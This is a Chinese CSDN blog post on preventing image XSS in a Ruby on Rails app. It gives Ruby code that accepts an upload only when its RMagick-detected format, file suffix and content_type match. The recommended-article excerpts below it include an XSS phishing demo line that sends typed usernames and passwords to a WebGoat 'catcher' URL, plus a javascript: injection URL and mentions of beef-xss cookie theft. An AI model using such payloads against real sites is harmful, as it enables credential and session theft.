image xss 3.ruby防止图片xss攻击的方法

最新推荐文章于 2024-04-09 01:30:06 发布
最新推荐文章于 2024-04-09 01:30:06 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: Rails v2.3.8 文章标签: image path file plugins ruby
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/microad_liy/article/details/6735209
版权

1、Rmagick插件中允许的content_type类型

\vendor\plugins\attachment_fu\lib\technoweenie\attachment_fu.rb 5~35行

image/jpeg | image/pjpeg | image/jpg | image/gif | image/png | image/x-png


2、ruby Rmagick content_type、Magick::ImageList.new(file_path).format与图片实际类型及后缀名的关系


3、由1和2得出下表为安全图片


图片的实际类型,后缀名和content_type一致的话,能确保图片不能发动xss攻击。


4、代码

 is_safe_image = false

 image_real_format = real_content_type(file_path)

is_safe_image = true if "GIF" == image_real_format && "gif" == image_suffix && %q|image/gif| == image_content_type

 is_safe_image = true if "PNG" == image_real_format && "png" == image_suffix && %w(image/png image/x-png).member?(image_content_type)

is_safe_image = true if "JPEG" == image_real_format && %w(jpg jpeg jpe jfif).member?(image_suffix) && %w(image/jpeg image/pjpeg image/jpg).member?(image_content_type)


def real_content_type(file_path)

    Magick::ImageList.new(file_path).format

end


microad_liy
关注
专栏目录
20-5 XSS的利用(包含:蓝莲花、beef-xss
weixin_43263566的博客
01-12 341
存储型XSS是一种特殊类型的XSS攻击。攻击者将带有XSS攻击代码的链接放在网页上的某个位置(例如评论框),当用户访问此链接并执行时,攻击者就能获取用户的敏感信息。由于存储型XSS能够攻击所有访问此页面的用户,因此其危害非常大。之后刷新网页或从其他菜单切换到当前url都会触发攻击,出现弹框。那知道了这个机制后我们就开始收集用户的cookie。
XSS基础原理(Cross-site scripting)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-13 1576
XSS基础原理(Cross-site scripting) 文章目录XSS基础原理(Cross-site scripting)什么是跨站脚本 (XSS)?XSS 攻击主要分为三种类反射型 XSS,其中恶意脚本来自当前的 HTTP 请求案例 1 大小写,双写绕过 dvwa_Medium案例 2 各种标签绕过 dvwa_high案例 3 htmlspecialchars pikachu_htmlspecialchars存储的 XSS,其中恶意脚本来自网站的数据库案例 1 replace()函数对尖括
image xss 1.图片发生xss攻击的条件、原因及对策
microad_liy的专栏
08-30 8590
发生image xss的条件   ・ IE6、IE7    ・图片的magic bite和content_type不一致   (解释①图片magic bite) 发生image xss的原因   Ie在进行content种别判断时,不单考虑content_type,还
图片引用功能导致的XSS漏洞
yggcwhat
09-29 2620
图片引用功能导致的XSS漏洞
XSS攻击
summer_fish的专栏
04-11 2529
前端有哪几种攻击方式? XSS攻击 CSRF攻击 点击劫持 URL跳转漏洞 什么是XSS攻击XSS(Cross-Site Scripting,跨站脚本攻击)是一种代码注入攻击。攻击者在目标网站上注入恶意代码,当用户(被攻击者)登录网站时就会执行这些恶意代码,通过这些脚本可以读取cookie,session tokens,或者网站其他敏感的网站信息,对用户进行钓鱼欺诈。 XSS的本质:恶意代码未经过滤,与网站的正常代码混在一起,浏览器无法分辨哪些脚本是可信的,导致恶意脚本被执行。由于直接在
图片XSS
不忘初心,护天下安全!
10-07 1935
参见:https://woj.app/1785.html
ctf课堂小练——web 杂项 xss攻击 图片隐写基础训练
qq_56074599的博客
09-14 1228
ctf课堂小练——web 杂项 xss攻击 图片隐写基础训练
image xss 4.能发动xss攻击图片的制作方法
microad_liy的专栏
09-01 6819
按照以下步骤,可以轻松制作出能发动xss攻击的.gif、.jpg图片。 1。制作原始图片  图1 这里为什么设置背景色? 为了图7处加入js脚本后,js脚本能够被执行的成功率更高。(js被加到图片的comment区域的机会更大) 图2
XSS介绍及利用
世间繁华梦一出
11-27 3480
XSS——跨站脚本攻击XSS介绍及利用 XSS介绍及利用 1、XSS介绍 XSS(cross site scripting)跨站脚本攻击, 恶意攻击者往web页面里插入恶意script代码,当用户浏览该页面时,代码就会被执行 2、XSS原理 在HTML中常用到字符实体,对常用到的字符实体没有进行转译,导致完整的标签出现,在可输入的文本框等某些区域内输入特定的某些标签导致代码被恶意篡改。 3、实现过程 (1)攻击者将恶意代码插入到服务器 (2)其他用户无防备的情况下访问服务器 (3)服务器对含有恶意代码的网页
存储XSS1
08-08
3. **传播恶意软件**:攻击者可以通过XSS注入下载恶意软件的链接,感染用户的计算机。 4. **流量劫持**:攻击者可重定向用户到其他恶意网站,比如赌博、色情站点,或者用于分布式拒绝服务(DDoS)攻击的网站。 **...
跨站脚本攻击XSS
heibaikong6的博客
10-27 437
XSS简介 跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身份进...
PHP防止图片木马攻击
weixin_33868027的博客
05-08 682
2019独角兽企业重金招聘Python工程师标准>>> ...
XSS漏洞: new Image().src = 'javascript:alert(1)';
j10a的专栏
06-19 946
百度空间改得都不知怎么用了,把一些以前的文章重新发过来 今天又发现了一个XSS,*_*, 给大家发下,引以为戒:   链接: http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://www.80vul.com&title=22222&summary=333&pics=javasc
浅析图片XSS中的哪些技术问题
weixin_33766805的博客
09-25 909
本文讲的是浅析图片XSS中的哪些技术问题,跨站请求漏洞是web漏洞中最普遍的漏洞,在特定的场景下可以造成很严重的破坏。可以让攻击者在受害者浏览器上执行一个恶意脚本,网络上关于这方面的文章已经很多了。 危害 想象下,如果我们能够在图片里直接插入JS脚本,并且在访问图片的时候能够触发这个脚本。那么我们就可以在网站文章下面的留言中上传图片,让用户不知不觉中招...
Web安全XSS
08-19 271
 简单的反射型XSS钓鱼演示 form> script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password="
跨站脚本攻击之xss手动版
weixin_47726676的博客
05-12 675
定义 Cross-site scripting (XSS):跨站脚本是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 类型 存储型(持久型) 跨站脚本可注入服务器的文件系统或数据库–引诱用户访问相关链接(貌似被用户信任的网站)–被攻击用户访问相关页面(采用特定URL参数)时,恶意代码下载到浏览器并执行。 反射型(非持久型) 跨站脚本包含在向网站提交内容的相关字段中–该字段将被服务器在返回页面中包含,相关字段中的跨站脚本将在浏览器端执行。–被攻击用户访
【网络安全之XSS跨站脚本攻击漏洞详解】,阿里网络安全开发面试解答
最新发布
m0_61331407的博客
04-09 903
XSS跨站脚本攻击主要分为反射型、存储型、DOM树型三种、
如何防止XSS攻击
qq_36752945的博客
07-20 7726
如何防止XSS攻击 XSS攻击(跨站点脚本攻击),意即黑客恶意篡改你网页的前端代码,在里面注入一些恶意的 html+javascript的脚本,在你的浏览器内运行,获取你的信息,进行一些恶意操作。 xxs攻击的两种方式 一、反射型攻击 黑客在钓鱼网站设置其URL链接,URL链接可为色情动图、诱惑小视频,此URL链接内嵌有其恶意脚本,你点后 ,恶意脚本被返回至你的浏览器里。此时脚本就会运行,一旦控制了浏览器可得到大量东西,浏览器内包含cookie,可利用cookie伪造你的用户登录的session 状态,去以
SpringBoot2.x使用Jsoup防范XSS攻击实战
SpringBoot 2.x作为流行的Java Web框架,提供了一种有效的方法来防御XSS攻击,那就是集成Jsoup库。 一、XSS攻击详解 XSS攻击是由于应用程序未能正确处理用户输入导致的。攻击者可以通过注入JavaScript、HTML或其他...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值